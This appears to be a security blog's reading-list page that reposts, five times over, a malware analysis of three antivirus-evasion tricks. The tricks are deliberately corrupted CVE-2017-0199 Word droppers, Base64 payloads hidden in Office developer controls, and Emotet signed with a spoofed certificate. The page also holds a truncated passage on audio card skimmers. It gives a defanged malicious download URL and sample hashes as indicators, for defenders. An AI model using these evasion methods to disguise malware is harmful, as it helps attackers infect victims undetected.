About The Reading List

To keep current on threats and what they mean to businesses, I read a lot of sources every day. So I had the idea, why not share our reading list with everyone. So this page is dedicated to the never ending collection of articles that I think are important.

Playing Cat and Mouse: Three Techniques Abused to Avoid Detection

Read Full Article

Theexperts at -Cybaze Zlab described three techniques commonly implemented by threat actors to avoid detection.

Introduction

During our analysis we constantly run into the tricks cyber-attackers use to bypass companies security defences, sometimes advanced, others not. Many times, despite their elegance (or lack of it), these techniques are effective and actually help the cyber criminals to get into victim computers and penetrate company networks.

This technical article aims to bring to light details of some of the techniques currently abused by various threat actors, in order to help security operators, industry and companies to mitigate their effects.

Technical Analysis

The following sections describe three cases we recently dissected, highlighting some of the tricks cyber-criminals and threat groups are currently using to avoid detection. The first two are techniques related to Office documents, used to hide malicious payload and lure the users. The third one is related to binary payloads abusing code signature tricks to evade traditional security controls.

The Broken Doc

Sha256 e2f931207a217983c8608253b137b7874f5b402b15039b3788e5fa2e8fc040da
Threat cve-2017-0199 document
Brief Description Document Dropper exploiting cve-2017-0199
Ssdeep 96:Hd4+dGCbidUEd9IUfPLIuSdFpMcuGg5mLWStWiWrVMd92c SCedL0m03mbRTiqhrr:C+bcyucyMtWNYk0mqQTnhr5OARQT6

Table 1. Sample information

The first trick we dissected employs a “voluntary document corruption” to persuade the user to restore the original file and to download the malicious payload without noticing any suspicious alert. As study case we chosen a Word document containing the CVE-2017-0199 exploit, which allows the document to download and execute arbitrary code at opening time. The following figure shows the external reference towards the remote code will be executed: “hxxps://www.protectiadatelor[.biz/js/Oj1/smile.doc”.

Figure 1. External resource in the analyzed document

Normally, the opening of the weaponized document such as this one will likely alert a trained, aware user: a strange popup window alerts the presence of a “link” referring to external files.

Figure 2. Suspicious popup window

This message could be suspicious for the victim, so he could delete the document, avoiding the infection. But through the tricks we have observed, the “user warning” may be bypassed. The sample contains a carefully corruption of the document itself: some bytes have been deleted by the attacker without impacting the behavior of the exploit.

Figure 3. Corrupted document

Once the user will open the crafted file, MS Word displays a different popup message: now it reports the document is corrupted and asks to confirm its restoration. A totally different message than the previous one, letting the victim think the document is just broken. 

Figure 4. Popup window reporting the impossibility of opening the document

After the “Yes” click, MS Word automatically restores the file content and starts the exploit, which will download and execute other payloads.

Hide Payload with Office Developer Mode

Other malicious documents we analyzed employ tricks to hide the real payload in MS Office developer control objects: components often not visible to the end users. In most Office installations, in fact, the developer tab is disabled by default, so it is even more difficult to identify the presence of anomalous objects.

This technique has been employed in a sample we analyzed few time ago too. At opening time the document looks like many others.

Figure 5. Classic phishing document view

However, the macro code analysis reveals that the real payload is contained elsewhere, in particular in an object named “Kplkaaaaaaaz”.

Figure 6. Part of macro code embedded in the document

This hidden object appears as a tiny text box just after the enabling of macro code (Figure 7).

Figure 7. Document’s modified view

Without enabling Word developer mode, in the appropriate Option menu, it is impossible to select and modify the object’s properties. So, after enabling it, we were able to explore the object content: the Base64 encoded payload.

Figure 8. Extracted payload

Using this strategy, the malware writer moves the identifiable payload in a section which is more difficult to detect both for automatic and manual analysis, obtaining a lower detection rate during static analysis.

Spoofed Signature

Another interesting technique abused by cyber-criminals in the wild is the “Certificate Spoofing“, allowing malware to easily bypass a relevant portion of anti-virus engines, even if they employ identification techniques theoretically able to detect encrypted and packed threats. Indeed, attackers could also obtain a valid certificate for his malware stealing cryptographic keys to legit owners or leveraging rogue companies, as observed in the signed Email Stealer used by the TA505 hacker group, described in our report.

However, in many cases evading detection could require less effort: even an invalid certificate is enough to achieve the goal, such as in a recent Ursnif attack campaign (sample on Yomi Hunter).

Figure 9. Spoofed signature on Ursnif sample

Using certificate spoofing techniques an attacker may sign an arbitrary executable using an arbitrary certificate from any website. As study case, we reproduced this techniques signing a known Emotet binary leveraging the Symantec website certificate.

Sha256 ff7283f7b9eb077603a6963f1c6f95abefd0d5acdae4bddc691ac57c3f6a8e05
Threat Emotet
Brief Description Emotet payload
Ssdeep 1536:X6fyfENGX6yu5XLyR2zrcPSDILuhJiI9+F04OLD2DjalDxX 7CLNiu:X6ho6yuxU8Dhc++uD32azXGLN

Table 2. Sample information

Sha256 a3586bee7179bcf60f25c4dc3d25e341a01ca73fdfbea290c5df9d2601c9bb90
Threat Emotet
Brief Description Emotet payload signed using Symantec cert
Ssdeep 1536:U6fyfENGX6yu5XLyR2zrcPSDILuhJiI9+F04OLD2DjalDxX7 CLNiuexK3hJw:U6ho6yuxU8Dhc++uD32azXGLNuIw

Table 3. Sample information

Figure 10. Comparison between samples without and with fake certificate

As confirmed by the Microsoft SignTool utility the file signature results invalid, as expected.

Figure 11. SignTool check reporting the certificate was invalid

However, this trick led to a decrease of the VirusTotal detection rate from 36 to 20. Even Symantec AV didn’t detect the sample as malicious!  

For the sake of correctness, as Chronicle Security states, Virustotal is not a “comparative metrics between different antivirus products”, so this result does not imply anything about the overall antivirus solutions quality. Conservatively, it provides a clue about an inner detection mechanisms, showing how attackers bypass some identification logic; not the whole AV solution.

Figure 12. Detection rate decrease thanks to certificate addition

The low-level diff analysis between the two samples confirms the certificate addition does not impact in any way the functional parts of the malware and, therefore, its behavior.

Figure 13. Comparison between samples without and with fake certificate at hex level

Conclusion

The shown techniques are only a part of the countless escamotage implemented by threat actors to make detection harder. We constantly observe attack attempts using these kind of tricks and we are still surprised to see how, nowadays, they can frequently decrease the detection rate, even if the tricks are well known.

We hope that a direct spotlight on few of these tricks would push the eternal cat and mouse game between security players and cyber-criminals a bit further, raising the bar and the costs for malicious attackers who are threatening users and companies.

Further technical details, including IoCs and Yara rules are reported in the original analysis published on the Yoroi blog:

https://blog.yoroi.company/research/playing-cat-and-mouse-three-techniques-abused-to-avoid-detection/


If you appreciate my effort in spreading cybersecurity awareness, please vote
for Security Affairs in the section “Your Vote for the Best EU Security
Tweeter”

Thank you

Pierluigi Paganini

( – malware, avoid detection)

Read Full Article

Playing Cat and Mouse: Three Techniques Abused to Avoid Detection

Read Full Article

Theexperts at -Cybaze Zlab described three techniques commonly implemented by threat actors to avoid detection.

Introduction

During our analysis we constantly run into the tricks cyber-attackers use to bypass companies security defences, sometimes advanced, others not. Many times, despite their elegance (or lack of it), these techniques are effective and actually help the cyber criminals to get into victim computers and penetrate company networks.

This technical article aims to bring to light details of some of the techniques currently abused by various threat actors, in order to help security operators, industry and companies to mitigate their effects.

Technical Analysis

The following sections describe three cases we recently dissected, highlighting some of the tricks cyber-criminals and threat groups are currently using to avoid detection. The first two are techniques related to Office documents, used to hide malicious payload and lure the users. The third one is related to binary payloads abusing code signature tricks to evade traditional security controls.

The Broken Doc

Sha256 e2f931207a217983c8608253b137b7874f5b402b15039b3788e5fa2e8fc040da
Threat cve-2017-0199 document
Brief Description Document Dropper exploiting cve-2017-0199
Ssdeep 96:Hd4+dGCbidUEd9IUfPLIuSdFpMcuGg5mLWStWiWrVMd92c SCedL0m03mbRTiqhrr:C+bcyucyMtWNYk0mqQTnhr5OARQT6

Table 1. Sample information

The first trick we dissected employs a “voluntary document corruption” to persuade the user to restore the original file and to download the malicious payload without noticing any suspicious alert. As study case we chosen a Word document containing the CVE-2017-0199 exploit, which allows the document to download and execute arbitrary code at opening time. The following figure shows the external reference towards the remote code will be executed: “hxxps://www.protectiadatelor[.biz/js/Oj1/smile.doc”.

Figure 1. External resource in the analyzed document

Normally, the opening of the weaponized document such as this one will likely alert a trained, aware user: a strange popup window alerts the presence of a “link” referring to external files.

Figure 2. Suspicious popup window

This message could be suspicious for the victim, so he could delete the document, avoiding the infection. But through the tricks we have observed, the “user warning” may be bypassed. The sample contains a carefully corruption of the document itself: some bytes have been deleted by the attacker without impacting the behavior of the exploit.

Figure 3. Corrupted document

Once the user will open the crafted file, MS Word displays a different popup message: now it reports the document is corrupted and asks to confirm its restoration. A totally different message than the previous one, letting the victim think the document is just broken. 

Figure 4. Popup window reporting the impossibility of opening the document

After the “Yes” click, MS Word automatically restores the file content and starts the exploit, which will download and execute other payloads.

Hide Payload with Office Developer Mode

Other malicious documents we analyzed employ tricks to hide the real payload in MS Office developer control objects: components often not visible to the end users. In most Office installations, in fact, the developer tab is disabled by default, so it is even more difficult to identify the presence of anomalous objects.

This technique has been employed in a sample we analyzed few time ago too. At opening time the document looks like many others.

Figure 5. Classic phishing document view

However, the macro code analysis reveals that the real payload is contained elsewhere, in particular in an object named “Kplkaaaaaaaz”.

Figure 6. Part of macro code embedded in the document

This hidden object appears as a tiny text box just after the enabling of macro code (Figure 7).

Figure 7. Document’s modified view

Without enabling Word developer mode, in the appropriate Option menu, it is impossible to select and modify the object’s properties. So, after enabling it, we were able to explore the object content: the Base64 encoded payload.

Figure 8. Extracted payload

Using this strategy, the malware writer moves the identifiable payload in a section which is more difficult to detect both for automatic and manual analysis, obtaining a lower detection rate during static analysis.

Spoofed Signature

Another interesting technique abused by cyber-criminals in the wild is the “Certificate Spoofing“, allowing malware to easily bypass a relevant portion of anti-virus engines, even if they employ identification techniques theoretically able to detect encrypted and packed threats. Indeed, attackers could also obtain a valid certificate for his malware stealing cryptographic keys to legit owners or leveraging rogue companies, as observed in the signed Email Stealer used by the TA505 hacker group, described in our report.

However, in many cases evading detection could require less effort: even an invalid certificate is enough to achieve the goal, such as in a recent Ursnif attack campaign (sample on Yomi Hunter).

Figure 9. Spoofed signature on Ursnif sample

Using certificate spoofing techniques an attacker may sign an arbitrary executable using an arbitrary certificate from any website. As study case, we reproduced this techniques signing a known Emotet binary leveraging the Symantec website certificate.

Sha256 ff7283f7b9eb077603a6963f1c6f95abefd0d5acdae4bddc691ac57c3f6a8e05
Threat Emotet
Brief Description Emotet payload
Ssdeep 1536:X6fyfENGX6yu5XLyR2zrcPSDILuhJiI9+F04OLD2DjalDxX 7CLNiu:X6ho6yuxU8Dhc++uD32azXGLN

Table 2. Sample information

Sha256 a3586bee7179bcf60f25c4dc3d25e341a01ca73fdfbea290c5df9d2601c9bb90
Threat Emotet
Brief Description Emotet payload signed using Symantec cert
Ssdeep 1536:U6fyfENGX6yu5XLyR2zrcPSDILuhJiI9+F04OLD2DjalDxX7 CLNiuexK3hJw:U6ho6yuxU8Dhc++uD32azXGLNuIw

Table 3. Sample information

Figure 10. Comparison between samples without and with fake certificate

As confirmed by the Microsoft SignTool utility the file signature results invalid, as expected.

Figure 11. SignTool check reporting the certificate was invalid

However, this trick led to a decrease of the VirusTotal detection rate from 36 to 20. Even Symantec AV didn’t detect the sample as malicious!  

For the sake of correctness, as Chronicle Security states, Virustotal is not a “comparative metrics between different antivirus products”, so this result does not imply anything about the overall antivirus solutions quality. Conservatively, it provides a clue about an inner detection mechanisms, showing how attackers bypass some identification logic; not the whole AV solution.

Figure 12. Detection rate decrease thanks to certificate addition

The low-level diff analysis between the two samples confirms the certificate addition does not impact in any way the functional parts of the malware and, therefore, its behavior.

Figure 13. Comparison between samples without and with fake certificate at hex level

Conclusion

The shown techniques are only a part of the countless escamotage implemented by threat actors to make detection harder. We constantly observe attack attempts using these kind of tricks and we are still surprised to see how, nowadays, they can frequently decrease the detection rate, even if the tricks are well known.

We hope that a direct spotlight on few of these tricks would push the eternal cat and mouse game between security players and cyber-criminals a bit further, raising the bar and the costs for malicious attackers who are threatening users and companies.

Further technical details, including IoCs and Yara rules are reported in the original analysis published on the Yoroi blog:

https://blog.yoroi.company/research/playing-cat-and-mouse-three-techniques-abused-to-avoid-detection/


If you appreciate my effort in spreading cybersecurity awareness, please vote
for Security Affairs in the section “Your Vote for the Best EU Security
Tweeter”

Thank you

Pierluigi Paganini

( – malware, avoid detection)

Read Full Article

Playing Cat and Mouse: Three Techniques Abused to Avoid Detection

Read Full Article

Theexperts at -Cybaze Zlab described three techniques commonly implemented by threat actors to avoid detection.

Introduction

During our analysis we constantly run into the tricks cyber-attackers use to bypass companies security defences, sometimes advanced, others not. Many times, despite their elegance (or lack of it), these techniques are effective and actually help the cyber criminals to get into victim computers and penetrate company networks.

This technical article aims to bring to light details of some of the techniques currently abused by various threat actors, in order to help security operators, industry and companies to mitigate their effects.

Technical Analysis

The following sections describe three cases we recently dissected, highlighting some of the tricks cyber-criminals and threat groups are currently using to avoid detection. The first two are techniques related to Office documents, used to hide malicious payload and lure the users. The third one is related to binary payloads abusing code signature tricks to evade traditional security controls.

The Broken Doc

Sha256 e2f931207a217983c8608253b137b7874f5b402b15039b3788e5fa2e8fc040da
Threat cve-2017-0199 document
Brief Description Document Dropper exploiting cve-2017-0199
Ssdeep 96:Hd4+dGCbidUEd9IUfPLIuSdFpMcuGg5mLWStWiWrVMd92c SCedL0m03mbRTiqhrr:C+bcyucyMtWNYk0mqQTnhr5OARQT6

Table 1. Sample information

The first trick we dissected employs a “voluntary document corruption” to persuade the user to restore the original file and to download the malicious payload without noticing any suspicious alert. As study case we chosen a Word document containing the CVE-2017-0199 exploit, which allows the document to download and execute arbitrary code at opening time. The following figure shows the external reference towards the remote code will be executed: “hxxps://www.protectiadatelor[.biz/js/Oj1/smile.doc”.

Figure 1. External resource in the analyzed document

Normally, the opening of the weaponized document such as this one will likely alert a trained, aware user: a strange popup window alerts the presence of a “link” referring to external files.

Figure 2. Suspicious popup window

This message could be suspicious for the victim, so he could delete the document, avoiding the infection. But through the tricks we have observed, the “user warning” may be bypassed. The sample contains a carefully corruption of the document itself: some bytes have been deleted by the attacker without impacting the behavior of the exploit.

Figure 3. Corrupted document

Once the user will open the crafted file, MS Word displays a different popup message: now it reports the document is corrupted and asks to confirm its restoration. A totally different message than the previous one, letting the victim think the document is just broken. 

Figure 4. Popup window reporting the impossibility of opening the document

After the “Yes” click, MS Word automatically restores the file content and starts the exploit, which will download and execute other payloads.

Hide Payload with Office Developer Mode

Other malicious documents we analyzed employ tricks to hide the real payload in MS Office developer control objects: components often not visible to the end users. In most Office installations, in fact, the developer tab is disabled by default, so it is even more difficult to identify the presence of anomalous objects.

This technique has been employed in a sample we analyzed few time ago too. At opening time the document looks like many others.

Figure 5. Classic phishing document view

However, the macro code analysis reveals that the real payload is contained elsewhere, in particular in an object named “Kplkaaaaaaaz”.

Figure 6. Part of macro code embedded in the document

This hidden object appears as a tiny text box just after the enabling of macro code (Figure 7).

Figure 7. Document’s modified view

Without enabling Word developer mode, in the appropriate Option menu, it is impossible to select and modify the object’s properties. So, after enabling it, we were able to explore the object content: the Base64 encoded payload.

Figure 8. Extracted payload

Using this strategy, the malware writer moves the identifiable payload in a section which is more difficult to detect both for automatic and manual analysis, obtaining a lower detection rate during static analysis.

Spoofed Signature

Another interesting technique abused by cyber-criminals in the wild is the “Certificate Spoofing“, allowing malware to easily bypass a relevant portion of anti-virus engines, even if they employ identification techniques theoretically able to detect encrypted and packed threats. Indeed, attackers could also obtain a valid certificate for his malware stealing cryptographic keys to legit owners or leveraging rogue companies, as observed in the signed Email Stealer used by the TA505 hacker group, described in our report.

However, in many cases evading detection could require less effort: even an invalid certificate is enough to achieve the goal, such as in a recent Ursnif attack campaign (sample on Yomi Hunter).

Figure 9. Spoofed signature on Ursnif sample

Using certificate spoofing techniques an attacker may sign an arbitrary executable using an arbitrary certificate from any website. As study case, we reproduced this techniques signing a known Emotet binary leveraging the Symantec website certificate.

Sha256 ff7283f7b9eb077603a6963f1c6f95abefd0d5acdae4bddc691ac57c3f6a8e05
Threat Emotet
Brief Description Emotet payload
Ssdeep 1536:X6fyfENGX6yu5XLyR2zrcPSDILuhJiI9+F04OLD2DjalDxX 7CLNiu:X6ho6yuxU8Dhc++uD32azXGLN

Table 2. Sample information

Sha256 a3586bee7179bcf60f25c4dc3d25e341a01ca73fdfbea290c5df9d2601c9bb90
Threat Emotet
Brief Description Emotet payload signed using Symantec cert
Ssdeep 1536:U6fyfENGX6yu5XLyR2zrcPSDILuhJiI9+F04OLD2DjalDxX7 CLNiuexK3hJw:U6ho6yuxU8Dhc++uD32azXGLNuIw

Table 3. Sample information

Figure 10. Comparison between samples without and with fake certificate

As confirmed by the Microsoft SignTool utility the file signature results invalid, as expected.

Figure 11. SignTool check reporting the certificate was invalid

However, this trick led to a decrease of the VirusTotal detection rate from 36 to 20. Even Symantec AV didn’t detect the sample as malicious!  

For the sake of correctness, as Chronicle Security states, Virustotal is not a “comparative metrics between different antivirus products”, so this result does not imply anything about the overall antivirus solutions quality. Conservatively, it provides a clue about an inner detection mechanisms, showing how attackers bypass some identification logic; not the whole AV solution.

Figure 12. Detection rate decrease thanks to certificate addition

The low-level diff analysis between the two samples confirms the certificate addition does not impact in any way the functional parts of the malware and, therefore, its behavior.

Figure 13. Comparison between samples without and with fake certificate at hex level

Conclusion

The shown techniques are only a part of the countless escamotage implemented by threat actors to make detection harder. We constantly observe attack attempts using these kind of tricks and we are still surprised to see how, nowadays, they can frequently decrease the detection rate, even if the tricks are well known.

We hope that a direct spotlight on few of these tricks would push the eternal cat and mouse game between security players and cyber-criminals a bit further, raising the bar and the costs for malicious attackers who are threatening users and companies.

Further technical details, including IoCs and Yara rules are reported in the original analysis published on the Yoroi blog:

https://blog.yoroi.company/research/playing-cat-and-mouse-three-techniques-abused-to-avoid-detection/


If you appreciate my effort in spreading cybersecurity awareness, please vote
for Security Affairs in the section “Your Vote for the Best EU Security
Tweeter”

Thank you

Pierluigi Paganini

( – malware, avoid detection)

Read Full Article

Playing Cat and Mouse: Three Techniques Abused to Avoid Detection

Read Full Article

Theexperts at -Cybaze Zlab described three techniques commonly implemented by threat actors to avoid detection.

Introduction

During our analysis we constantly run into the tricks cyber-attackers use to bypass companies security defences, sometimes advanced, others not. Many times, despite their elegance (or lack of it), these techniques are effective and actually help the cyber criminals to get into victim computers and penetrate company networks.

This technical article aims to bring to light details of some of the techniques currently abused by various threat actors, in order to help security operators, industry and companies to mitigate their effects.

Technical Analysis

The following sections describe three cases we recently dissected, highlighting some of the tricks cyber-criminals and threat groups are currently using to avoid detection. The first two are techniques related to Office documents, used to hide malicious payload and lure the users. The third one is related to binary payloads abusing code signature tricks to evade traditional security controls.

The Broken Doc

Sha256 e2f931207a217983c8608253b137b7874f5b402b15039b3788e5fa2e8fc040da
Threat cve-2017-0199 document
Brief Description Document Dropper exploiting cve-2017-0199
Ssdeep 96:Hd4+dGCbidUEd9IUfPLIuSdFpMcuGg5mLWStWiWrVMd92c SCedL0m03mbRTiqhrr:C+bcyucyMtWNYk0mqQTnhr5OARQT6

Table 1. Sample information

The first trick we dissected employs a “voluntary document corruption” to persuade the user to restore the original file and to download the malicious payload without noticing any suspicious alert. As study case we chosen a Word document containing the CVE-2017-0199 exploit, which allows the document to download and execute arbitrary code at opening time. The following figure shows the external reference towards the remote code will be executed: “hxxps://www.protectiadatelor[.biz/js/Oj1/smile.doc”.

Figure 1. External resource in the analyzed document

Normally, the opening of the weaponized document such as this one will likely alert a trained, aware user: a strange popup window alerts the presence of a “link” referring to external files.

Figure 2. Suspicious popup window

This message could be suspicious for the victim, so he could delete the document, avoiding the infection. But through the tricks we have observed, the “user warning” may be bypassed. The sample contains a carefully corruption of the document itself: some bytes have been deleted by the attacker without impacting the behavior of the exploit.

Figure 3. Corrupted document

Once the user will open the crafted file, MS Word displays a different popup message: now it reports the document is corrupted and asks to confirm its restoration. A totally different message than the previous one, letting the victim think the document is just broken. 

Figure 4. Popup window reporting the impossibility of opening the document

After the “Yes” click, MS Word automatically restores the file content and starts the exploit, which will download and execute other payloads.

Hide Payload with Office Developer Mode

Other malicious documents we analyzed employ tricks to hide the real payload in MS Office developer control objects: components often not visible to the end users. In most Office installations, in fact, the developer tab is disabled by default, so it is even more difficult to identify the presence of anomalous objects.

This technique has been employed in a sample we analyzed few time ago too. At opening time the document looks like many others.

Figure 5. Classic phishing document view

However, the macro code analysis reveals that the real payload is contained elsewhere, in particular in an object named “Kplkaaaaaaaz”.

Figure 6. Part of macro code embedded in the document

This hidden object appears as a tiny text box just after the enabling of macro code (Figure 7).

Figure 7. Document’s modified view

Without enabling Word developer mode, in the appropriate Option menu, it is impossible to select and modify the object’s properties. So, after enabling it, we were able to explore the object content: the Base64 encoded payload.

Figure 8. Extracted payload

Using this strategy, the malware writer moves the identifiable payload in a section which is more difficult to detect both for automatic and manual analysis, obtaining a lower detection rate during static analysis.

Spoofed Signature

Another interesting technique abused by cyber-criminals in the wild is the “Certificate Spoofing“, allowing malware to easily bypass a relevant portion of anti-virus engines, even if they employ identification techniques theoretically able to detect encrypted and packed threats. Indeed, attackers could also obtain a valid certificate for his malware stealing cryptographic keys to legit owners or leveraging rogue companies, as observed in the signed Email Stealer used by the TA505 hacker group, described in our report.

However, in many cases evading detection could require less effort: even an invalid certificate is enough to achieve the goal, such as in a recent Ursnif attack campaign (sample on Yomi Hunter).

Figure 9. Spoofed signature on Ursnif sample

Using certificate spoofing techniques an attacker may sign an arbitrary executable using an arbitrary certificate from any website. As study case, we reproduced this techniques signing a known Emotet binary leveraging the Symantec website certificate.

Sha256 ff7283f7b9eb077603a6963f1c6f95abefd0d5acdae4bddc691ac57c3f6a8e05
Threat Emotet
Brief Description Emotet payload
Ssdeep 1536:X6fyfENGX6yu5XLyR2zrcPSDILuhJiI9+F04OLD2DjalDxX 7CLNiu:X6ho6yuxU8Dhc++uD32azXGLN

Table 2. Sample information

Sha256 a3586bee7179bcf60f25c4dc3d25e341a01ca73fdfbea290c5df9d2601c9bb90
Threat Emotet
Brief Description Emotet payload signed using Symantec cert
Ssdeep 1536:U6fyfENGX6yu5XLyR2zrcPSDILuhJiI9+F04OLD2DjalDxX7 CLNiuexK3hJw:U6ho6yuxU8Dhc++uD32azXGLNuIw

Table 3. Sample information

Figure 10. Comparison between samples without and with fake certificate

As confirmed by the Microsoft SignTool utility the file signature results invalid, as expected.

Figure 11. SignTool check reporting the certificate was invalid

However, this trick led to a decrease of the VirusTotal detection rate from 36 to 20. Even Symantec AV didn’t detect the sample as malicious!  

For the sake of correctness, as Chronicle Security states, Virustotal is not a “comparative metrics between different antivirus products”, so this result does not imply anything about the overall antivirus solutions quality. Conservatively, it provides a clue about an inner detection mechanisms, showing how attackers bypass some identification logic; not the whole AV solution.

Figure 12. Detection rate decrease thanks to certificate addition

The low-level diff analysis between the two samples confirms the certificate addition does not impact in any way the functional parts of the malware and, therefore, its behavior.

Figure 13. Comparison between samples without and with fake certificate at hex level

Conclusion

The shown techniques are only a part of the countless escamotage implemented by threat actors to make detection harder. We constantly observe attack attempts using these kind of tricks and we are still surprised to see how, nowadays, they can frequently decrease the detection rate, even if the tricks are well known.

We hope that a direct spotlight on few of these tricks would push the eternal cat and mouse game between security players and cyber-criminals a bit further, raising the bar and the costs for malicious attackers who are threatening users and companies.

Further technical details, including IoCs and Yara rules are reported in the original analysis published on the Yoroi blog:

https://blog.yoroi.company/research/playing-cat-and-mouse-three-techniques-abused-to-avoid-detection/


If you appreciate my effort in spreading cybersecurity awareness, please vote
for Security Affairs in the section “Your Vote for the Best EU Security
Tweeter”

Thank you

Pierluigi Paganini

( – malware, avoid detection)

Read Full Article

Playing Cat and Mouse: Three Techniques Abused to Avoid Detection

Read Full Article

Theexperts at -Cybaze Zlab described three techniques commonly implemented by threat actors to avoid detection.

Introduction

During our analysis we constantly run into the tricks cyber-attackers use to bypass companies security defences, sometimes advanced, others not. Many times, despite their elegance (or lack of it), these techniques are effective and actually help the cyber criminals to get into victim computers and penetrate company networks.

This technical article aims to bring to light details of some of the techniques currently abused by various threat actors, in order to help security operators, industry and companies to mitigate their effects.

Technical Analysis

The following sections describe three cases we recently dissected, highlighting some of the tricks cyber-criminals and threat groups are currently using to avoid detection. The first two are techniques related to Office documents, used to hide malicious payload and lure the users. The third one is related to binary payloads abusing code signature tricks to evade traditional security controls.

The Broken Doc

Sha256 e2f931207a217983c8608253b137b7874f5b402b15039b3788e5fa2e8fc040da
Threat cve-2017-0199 document
Brief Description Document Dropper exploiting cve-2017-0199
Ssdeep 96:Hd4+dGCbidUEd9IUfPLIuSdFpMcuGg5mLWStWiWrVMd92c SCedL0m03mbRTiqhrr:C+bcyucyMtWNYk0mqQTnhr5OARQT6

Table 1. Sample information

The first trick we dissected employs a “voluntary document corruption” to persuade the user to restore the original file and to download the malicious payload without noticing any suspicious alert. As study case we chosen a Word document containing the CVE-2017-0199 exploit, which allows the document to download and execute arbitrary code at opening time. The following figure shows the external reference towards the remote code will be executed: “hxxps://www.protectiadatelor[.biz/js/Oj1/smile.doc”.

Figure 1. External resource in the analyzed document

Normally, the opening of the weaponized document such as this one will likely alert a trained, aware user: a strange popup window alerts the presence of a “link” referring to external files.

Figure 2. Suspicious popup window

This message could be suspicious for the victim, so he could delete the document, avoiding the infection. But through the tricks we have observed, the “user warning” may be bypassed. The sample contains a carefully corruption of the document itself: some bytes have been deleted by the attacker without impacting the behavior of the exploit.

Figure 3. Corrupted document

Once the user will open the crafted file, MS Word displays a different popup message: now it reports the document is corrupted and asks to confirm its restoration. A totally different message than the previous one, letting the victim think the document is just broken. 

Figure 4. Popup window reporting the impossibility of opening the document

After the “Yes” click, MS Word automatically restores the file content and starts the exploit, which will download and execute other payloads.

Hide Payload with Office Developer Mode

Other malicious documents we analyzed employ tricks to hide the real payload in MS Office developer control objects: components often not visible to the end users. In most Office installations, in fact, the developer tab is disabled by default, so it is even more difficult to identify the presence of anomalous objects.

This technique has been employed in a sample we analyzed few time ago too. At opening time the document looks like many others.

Figure 5. Classic phishing document view

However, the macro code analysis reveals that the real payload is contained elsewhere, in particular in an object named “Kplkaaaaaaaz”.

Figure 6. Part of macro code embedded in the document

This hidden object appears as a tiny text box just after the enabling of macro code (Figure 7).

Figure 7. Document’s modified view

Without enabling Word developer mode, in the appropriate Option menu, it is impossible to select and modify the object’s properties. So, after enabling it, we were able to explore the object content: the Base64 encoded payload.

Figure 8. Extracted payload

Using this strategy, the malware writer moves the identifiable payload in a section which is more difficult to detect both for automatic and manual analysis, obtaining a lower detection rate during static analysis.

Spoofed Signature

Another interesting technique abused by cyber-criminals in the wild is the “Certificate Spoofing“, allowing malware to easily bypass a relevant portion of anti-virus engines, even if they employ identification techniques theoretically able to detect encrypted and packed threats. Indeed, attackers could also obtain a valid certificate for his malware stealing cryptographic keys to legit owners or leveraging rogue companies, as observed in the signed Email Stealer used by the TA505 hacker group, described in our report.

However, in many cases evading detection could require less effort: even an invalid certificate is enough to achieve the goal, such as in a recent Ursnif attack campaign (sample on Yomi Hunter).

Figure 9. Spoofed signature on Ursnif sample

Using certificate spoofing techniques an attacker may sign an arbitrary executable using an arbitrary certificate from any website. As study case, we reproduced this techniques signing a known Emotet binary leveraging the Symantec website certificate.

Sha256 ff7283f7b9eb077603a6963f1c6f95abefd0d5acdae4bddc691ac57c3f6a8e05
Threat Emotet
Brief Description Emotet payload
Ssdeep 1536:X6fyfENGX6yu5XLyR2zrcPSDILuhJiI9+F04OLD2DjalDxX 7CLNiu:X6ho6yuxU8Dhc++uD32azXGLN

Table 2. Sample information

Sha256 a3586bee7179bcf60f25c4dc3d25e341a01ca73fdfbea290c5df9d2601c9bb90
Threat Emotet
Brief Description Emotet payload signed using Symantec cert
Ssdeep 1536:U6fyfENGX6yu5XLyR2zrcPSDILuhJiI9+F04OLD2DjalDxX7 CLNiuexK3hJw:U6ho6yuxU8Dhc++uD32azXGLNuIw

Table 3. Sample information

Figure 10. Comparison between samples without and with fake certificate

As confirmed by the Microsoft SignTool utility the file signature results invalid, as expected.

Figure 11. SignTool check reporting the certificate was invalid

However, this trick led to a decrease of the VirusTotal detection rate from 36 to 20. Even Symantec AV didn’t detect the sample as malicious!  

For the sake of correctness, as Chronicle Security states, Virustotal is not a “comparative metrics between different antivirus products”, so this result does not imply anything about the overall antivirus solutions quality. Conservatively, it provides a clue about an inner detection mechanisms, showing how attackers bypass some identification logic; not the whole AV solution.

Figure 12. Detection rate decrease thanks to certificate addition

The low-level diff analysis between the two samples confirms the certificate addition does not impact in any way the functional parts of the malware and, therefore, its behavior.

Figure 13. Comparison between samples without and with fake certificate at hex level

Conclusion

The shown techniques are only a part of the countless escamotage implemented by threat actors to make detection harder. We constantly observe attack attempts using these kind of tricks and we are still surprised to see how, nowadays, they can frequently decrease the detection rate, even if the tricks are well known.

We hope that a direct spotlight on few of these tricks would push the eternal cat and mouse game between security players and cyber-criminals a bit further, raising the bar and the costs for malicious attackers who are threatening users and companies.

Further technical details, including IoCs and Yara rules are reported in the original analysis published on the Yoroi blog:

https://blog.yoroi.company/research/playing-cat-and-mouse-three-techniques-abused-to-avoid-detection/


If you appreciate my effort in spreading cybersecurity awareness, please vote
for Security Affairs in the section “Your Vote for the Best EU Security
Tweeter”

Thank you

Pierluigi Paganini

( – malware, avoid detection)

Read Full Article

Carders Prefer Audio Skimmers over Less Efficient Flash Skimmers

Read Full Article

Although web skimming attacks are rampant these days, the underground market for physical card skimming devices is thriving and changing at the rate of technological advancements.

Card skimming is when cybercriminals add their own spying equipment to an automated teller machine (ATM) or point-of-sale system (PoS) to copy the information they process from credit or debit cards.

Offline carders organize in closed networks

Known as “real/offline carding,” this technique is ancient and has been giving headaches to both banks and the customers that got their cards copied.

Closed communities of professional skimmers have evolved into networks that provide both logistics and information for running card skimming operations. They have engineers, cashers, extractors, technicians, decoders, and vendors, all contributing their expertise, products, and services.

The typical targets include ATMs, PoS terminals, and gas stations, according to a report from Advanced Intelligence (AdvIntel) a fraud prevention company based in New York.

Exclusive skimming networks rely on technological advancements to develop, upgrade, and sell top-of-the-line products that are both powerful and stealthy.

Audio skimmers

Yelisey Boguslaskiy, director of security research at AdvIntel, monitored these markets and noticed a preference among criminals for audio skimmers. This was based on information from reputable shops and source intelligence.

At a price of about $1,500, audio skimmers are not a new thing. They’ve been around since 2010 and the method they used has been mentioned as early as 1992.

These devices capture the data and usually encrypt it, then store it in MP3 format. Because of the encryption, that price is just the first payment as sellers also charge for the decryption, otherwise the data is useless and cannot be used cloning cards or for online purchases.

Fast swiping with upgraded version

